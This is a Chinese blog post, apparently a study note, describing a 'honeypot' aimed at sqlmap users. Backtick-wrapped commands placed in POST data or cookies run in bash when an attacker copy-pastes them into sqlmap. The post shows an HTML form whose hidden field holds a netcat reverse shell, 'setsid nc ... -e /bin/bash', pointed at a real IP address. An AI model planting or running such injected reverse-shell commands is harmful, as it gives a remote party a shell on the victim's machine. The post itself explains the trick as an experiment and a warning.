<!doctype html>



  


<html class="theme-next pisces use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="学习记录," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.2" />






<meta name="description" content="记录一次很有意思的小实验&amp;#160; &amp;#160; &amp;#160; &amp;#160;前几天在freebuf上看到了一篇很有意思的文章，原文链接，在这篇文章中，作者讲了一个很有意思的事情，我们都知道sqlmap是一个渗透测试的神器，很多人都会使用它来sql注入，但如果没有注意看数据中的内容，就有可能中招。&amp;#160; &amp;#160; &amp;#160; &amp;#160;sqlmap都运行在bash下，而在bash中，">
<meta property="og:type" content="article">
<meta property="og:title" content="sqlmap中的“蜜罐”">
<meta property="og:url" content="http://yoursite.com/2016/10/22/sqlmap-honey/index.html">
<meta property="og:site_name" content="DenverB">
<meta property="og:description" content="记录一次很有意思的小实验&amp;#160; &amp;#160; &amp;#160; &amp;#160;前几天在freebuf上看到了一篇很有意思的文章，原文链接，在这篇文章中，作者讲了一个很有意思的事情，我们都知道sqlmap是一个渗透测试的神器，很多人都会使用它来sql注入，但如果没有注意看数据中的内容，就有可能中招。&amp;#160; &amp;#160; &amp;#160; &amp;#160;sqlmap都运行在bash下，而在bash中，">
<meta property="og:image" content="http://oeix47n80.bkt.clouddn.com/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202016-10-22%20%E4%B8%8A%E5%8D%8812.42.08.png">
<meta property="og:updated_time" content="2016-10-27T14:53:26.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="sqlmap中的“蜜罐”">
<meta name="twitter:description" content="记录一次很有意思的小实验&amp;#160; &amp;#160; &amp;#160; &amp;#160;前几天在freebuf上看到了一篇很有意思的文章，原文链接，在这篇文章中，作者讲了一个很有意思的事情，我们都知道sqlmap是一个渗透测试的神器，很多人都会使用它来sql注入，但如果没有注意看数据中的内容，就有可能中招。&amp;#160; &amp;#160; &amp;#160; &amp;#160;sqlmap都运行在bash下，而在bash中，">
<meta name="twitter:image" content="http://oeix47n80.bkt.clouddn.com/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202016-10-22%20%E4%B8%8A%E5%8D%8812.42.08.png">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://yoursite.com/2016/10/22/sqlmap-honey/"/>


  <title> sqlmap中的“蜜罐” | DenverB </title>
</head>

<body itemscope itemtype="//schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="//schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">DenverB</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">不忘初心，方得始终。</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="//schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                sqlmap中的“蜜罐”
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-10-22T00:31:09+08:00" content="2016-10-22">
              2016-10-22
            </time>
          </span>

          

          
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="记录一次很有意思的小实验"><a href="#记录一次很有意思的小实验" class="headerlink" title="记录一次很有意思的小实验"></a>记录一次很有意思的小实验</h1><p>&#160; &#160; &#160; &#160;前几天在freebuf上看到了一篇很有意思的文章，<a href="http://www.yilan.io/article/5805a294a3dd044f5a2ba81d" target="_blank" rel="external">原文链接</a>，在这篇文章中，作者讲了一个很有意思的事情，我们都知道sqlmap是一个渗透测试的神器，很多人都会使用它来sql注入，但如果没有注意看数据中的内容，就有可能中招。<br>&#160; &#160; &#160; &#160;sqlmap都运行在bash下，而在bash中，有着这样一个小特性，就是当我们输入的内容中含有”`command`“，那么command将会被执行并返回结果。来试一下：<br><img src="http://oeix47n80.bkt.clouddn.com/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202016-10-22%20%E4%B8%8A%E5%8D%8812.42.08.png" alt=""><br>&#160; &#160; &#160; &#160;从上面一段可以看到ls命令被成功执行了，而在第二条命令中，！！则代表了上一条指令，这也是bash的一个功能，另外，！＋n（数字）则代表之前的第n条指令。<br>&#160; &#160; &#160; &#160;之后我们来想想sqlmap的执行命令，sqlmap中有一个参数–data=”……”,还有一个是–cookie=”……”,他们分别代表了需要post提交的数据和用户的cookie，试想一下，如果我们是网站的开发者，我们就可以在post数据或者cookie中做手脚，我们在其中完全可以插入一条我们想要在攻击者电脑上执行的命令，而如果攻击者没有仔细阅读post数据或者cookie中的内容，而是选择直接复制粘贴的话，那么攻击者就可以被我们攻击了。来做个实验来测试一下。<br>&#160; &#160; &#160; &#160;首先，我们构造一个网站，这个网站可以post提交数据，我们在数据中插入一条nc命令，并让它在后台执行<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">div</span>&gt;</span></div><div class="line"><span class="meta">&lt;!DOCTYPE html&gt;</span></div><div class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></div><div class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></div><div class="line"><span class="tag">&lt;<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"Content-Type"</span> <span class="attr">content</span>=<span class="string">"text/html; charset=utf-8"</span>&gt;</span></div><div class="line">	<span class="tag">&lt;<span class="name">title</span>&gt;</span><span class="tag">&lt;/<span class="name">title</span>&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></div><div class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></div><div class="line"></div><div class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">style</span>=<span class="string">"text-align:center;padding-top:200px;"</span>&gt;</span></div><div class="line">	<span class="tag">&lt;<span class="name">form</span> <span class="attr">method</span>=<span class="string">"post"</span> <span class="attr">action</span>=<span class="string">"login_ret.php"</span> <span class="attr">enctype</span>=<span class="string">"text/plain"</span>&gt;</span></div><div class="line">		<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"data"</span> <span class="attr">value</span>=<span class="string">"`setsid nc 123.207.63.246 1234 -e /bin/bash`"</span> &gt;</span></div><div class="line">		<span class="tag">&lt;<span class="name">input</span> <span class="attr">style</span>=<span class="string">"font-size:25px"</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">name</span>=<span class="string">"subit"</span> <span class="attr">value</span>=<span class="string">"Injection"</span>&gt;</span></div><div class="line">	<span class="tag">&lt;/<span class="name">form</span>&gt;</span>	</div><div class="line"><span class="tag">&lt;/<span class="name">div</span>&gt;</span></div><div class="line"></div><div class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">div</span>&gt;</span></div></pre></td></tr></table></figure></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/学习记录/" rel="tag">#学习记录</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/10/19/Object-Injection/" rel="next" title="PHP中反序列化引起的安全问题">
                <i class="fa fa-chevron-left"></i> PHP中反序列化引起的安全问题
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/10/22/sqlmap/" rel="prev" title="sqlmap中的“蜜罐”实验">
                sqlmap中的“蜜罐”实验 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="//schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="http://oeix47n80.bkt.clouddn.com/IMG_0023.JPG"
               alt="DenverB" />
          <p class="site-author-name" itemprop="name">DenverB</p>
          <p class="site-description motion-element" itemprop="description">不忘初心，方得始终。</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">7</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">3</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#记录一次很有意思的小实验"><span class="nav-number">1.</span> <span class="nav-text">记录一次很有意思的小实验</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">DenverB</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.2"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.0.2"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.0.2"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.2"></script>



  



  




  
  

  

  

  

  


</body>
</html>
